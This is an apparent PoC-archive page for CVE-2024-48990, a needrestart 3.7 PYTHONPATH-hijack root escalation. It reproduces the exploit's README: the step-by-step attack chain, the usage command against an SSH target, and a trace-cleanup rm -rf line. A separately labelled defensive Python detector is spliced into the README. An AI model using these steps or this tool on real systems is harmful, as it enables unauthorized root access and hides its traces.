
PoC details: 4e67781a5c3c59dafd3a83461fb54c9d6a9b0923

Source
Related vulnerability
Title: needrestart security vulnerability (CVE-2024-48990)
Description: needrestart is a tool by the individual developer liske that checks which daemons need to be restarted after an upgrade. Versions of needrestart before 3.8 contain a security vulnerability: a local attacker can trick needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable and thereby execute arbitrary code as root.
Description
Automated local privilege escalation exploit for CVE-2024-48990 (needrestart v3.7), leveraging PYTHONPATH hijacking to gain root access.
Introduction
# CVE-2024-48990 PYTHONPATH Hijack - Privilege Escalation Exploit

This tool automates the exploitation of a privilege escalation vulnerability in `needrestart` version 3.7, identified as **CVE-2024-48990**.  
It achieves root execution by leveraging the insecure use of the `PYTHONPATH` environment variable when `needrestart` scans Python processes.

## Summary

The exploit works by:

1. Compiling a malicious shared object (`__init__.so`) that is triggered on import.
2. Serving the `.so` via a local HTTP server.
3. Connecting to the target via SSH and preparing a malicious `PYTHONPATH` environment.
4. Launching a Python bait process that continuously imports `importlib`.
5. Running `needrestart`, which inherits the manipulated `PYTHONPATH`, loads the malicious module, and executes the payload as root.
6. The payload creates a SUID binary (`/tmp/poc`), allowing root shell access.
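As an added defensive example (not part of this repository), the check below scans process records in the `/proc/<pid>/environ` format for Python interpreters whose `PYTHONPATH` points into a user-writable directory, which is the condition steps 3 and 4 above set up and the signal a host monitor would look for; the prefix list and the sample records are constructed assumptions.

```python
import os
from typing import Dict, List, Tuple

# Assumed prefix list: trees an unprivileged user can normally write to.
# A PYTHONPATH entry under one of these is the precondition the hijack relies on.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Parse the NUL-separated KEY=VALUE layout of /proc/<pid>/environ."""
    env: Dict[str, str] = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspicious_pythonpath_entries(env: Dict[str, str]) -> List[str]:
    """Return PYTHONPATH entries that are relative or under a user-writable tree."""
    flagged: List[str] = []
    for entry in env.get("PYTHONPATH", "").split(os.pathsep):
        if not entry:
            continue
        if not entry.startswith("/"):
            flagged.append(entry)  # relative: resolved against the process CWD
            continue
        normalized = os.path.normpath(entry) + "/"  # "/tmp" -> "/tmp/", not "/tmpfoo"
        if any(normalized.startswith(p) for p in USER_WRITABLE_PREFIXES):
            flagged.append(entry)
    return flagged


def scan_processes(records: List[Tuple[int, str, bytes]]) -> List[Tuple[int, str, List[str]]]:
    """records mimic (pid, /proc/<pid>/comm, /proc/<pid>/environ); report Python hits."""
    hits: List[Tuple[int, str, List[str]]] = []
    for pid, comm, raw in records:
        if comm.startswith("python"):
            flagged = suspicious_pythonpath_entries(parse_environ(raw))
            if flagged:
                hits.append((pid, comm, flagged))
    return hits


# Constructed sample records, not captured from a real host.
SAMPLE_RECORDS = [
    (1234, "python3", b"HOME=/home/alice\0PYTHONPATH=/tmp/malicious\0PATH=/usr/bin\0"),
    (1235, "python3", b"PYTHONPATH=/opt/app/lib:/usr/lib/python3/dist-packages\0"),
    (1236, "sshd", b"PYTHONPATH=/tmp/x\0"),  # not a Python interpreter; ignored
]
```

On a live host the same functions can be fed from `/proc/<pid>/comm` and `/proc/<pid>/environ`; a hit is worth correlating with any subsequent root-level `needrestart` run.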

## Usage

Run the exploit from your attacker machine:

    python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>

Parameters:

- `--user` SSH username on the target
- `--host` Target IP address
- `--att-ip` Attacker IP (used for hosting the payload)
- `--ssh-pass` SSH password (omit if using SSH keys)
- `--http-port` Optional HTTP port (default: 8000)

## CVE

- **CVE ID:** [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)
- **Affected Software:** `needrestart` version 3.7
- **Vulnerability Type:** Insecure environment variable handling
- **Impact:** Local privilege escalation to root

## Cleanup

To remove exploit traces from the target:

    rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh

## Requirements

### Attacker machine:
- Python 3
- `pexpect` (`pip3 install pexpect`)
- `gcc` (for compiling the payload)
- Open SSH access to the target
- `python3 -m http.server` (automatically started by the script)

### Target machine:
- A vulnerable version of `needrestart` (v3.7)
- A non-root user with `sudo` NOPASSWD rights for `/usr/sbin/needrestart`
- Python 3 and `curl` installed

## Disclaimer

This tool is provided for educational and authorized security testing purposes only.
Do not use it on systems you do not own or without explicit permission.
File snapshot

    [4.0K] /data/pocs/4e67781a5c3c59dafd3a83461fb54c9d6a9b0923
    ├── [4.3K] exploit.py
    ├── [1.0K] LICENSE
    └── [2.2K] README.md

    1 directory, 3 files

Cached for you by the Shenlong bot.
Notes
    1. Accessing the original source is recommended first.
    2. If the source is gone or unreachable, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.